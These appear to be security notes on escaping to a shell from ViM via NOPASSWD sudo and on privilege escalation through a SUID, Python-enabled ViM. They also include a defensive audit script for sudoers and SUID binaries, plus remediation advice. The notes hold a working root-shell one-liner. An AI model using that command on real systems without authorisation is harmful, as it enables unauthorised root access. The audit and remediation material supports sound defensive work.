Getting a shell

How to get a shell from ViM

If sudo permits ViM to be run with NOPASSWD, then commands can be executed as admin from inside the editor using the ! prefix.

However, if a non-standard shell is set in /etc/passwd, Vi and ViM may not be able to shell out with :shell or execute shell commands with !. This is because both editors run $SHELL (in the case of :shell) or $SHELL -c $COMMAND (in the case of !), and an exotic shell may not accept that invocation.

Fortunately, Vi and ViM can be set to override the default $SHELL using :set shell=/bin/bash.

(Exotic shells in /etc/passwd can also cause commands executed via ssh to fail for the same reason.)


Exploiting SUID ViM

How to escalate privileges from SUID ViM

If ViM is SUID root and is compiled with Python support, it can be used for privilege escalation.

vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

Use :py instead if only Python 2 is available.
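
To audit a host for both conditions described in these notes (a NOPASSWD sudo rule for Vi/ViM, and a SUID ViM binary built with Python), the following is an added example, not part of the original notes. The function names, the sample sudoers text and the list of editor binary names are assumptions made for illustration.

```shell
#!/bin/sh
# Added audit example; not part of the original notes.

# Print sudoers rules (read from stdin) that grant vi/vim with NOPASSWD.
# Simplification: Cmnd_Alias names and line continuations are not resolved.
flag_sudoers() {
    awk '
        /^[ \t]*#/ { next }                       # comments and #include lines
        /NOPASSWD:/ {
            spec = $0
            sub(/^.*NOPASSWD:[ \t]*/, "", spec)   # keep only the command list
            n = split(spec, cmds, ",")
            for (i = 1; i <= n; i++) {
                split(cmds[i], words, " ")        # words[1] is the command path
                base = words[1]
                sub(/^.*\//, "", base)            # strip the directory part
                if (base ~ /^(vi|view|vimdiff|vim)$/ || base ~ /^vim\./) {
                    print NR ": " $0
                    break
                }
            }
        }'
}

# List SUID vi/vim binaries under the given directories.
find_suid_vim() {
    find "$@" -xdev -type f -perm -4000 \
        \( -name vi -o -name view -o -name vimdiff -o -name vim -o -name 'vim.*' \) \
        2>/dev/null
}

# Succeeds if "vim --version" output on stdin reports Python support
# (+python, +python3, or the /dyn variants).
vim_has_python() {
    grep -Eq '(^|[[:space:]])\+python3?'
}

# Constructed sample input, for demonstration only.
SAMPLE='# constructed sample sudoers
root    ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, /usr/bin/vim /etc/app/app.conf
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
ops     ALL=(ALL) /usr/bin/vim'

printf '%s\n' "$SAMPLE" | flag_sudoers
# Real use (as root):  flag_sudoers < /etc/sudoers
#                      find_suid_vim /usr/bin /usr/local/bin
#                      /path/to/vim --version | vim_has_python && echo "python enabled"
```

Either finding is remediated by removing the grant: clear the SUID bit with chmod u-s, or replace the sudoers entry with sudoedit for the specific files that need editing.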
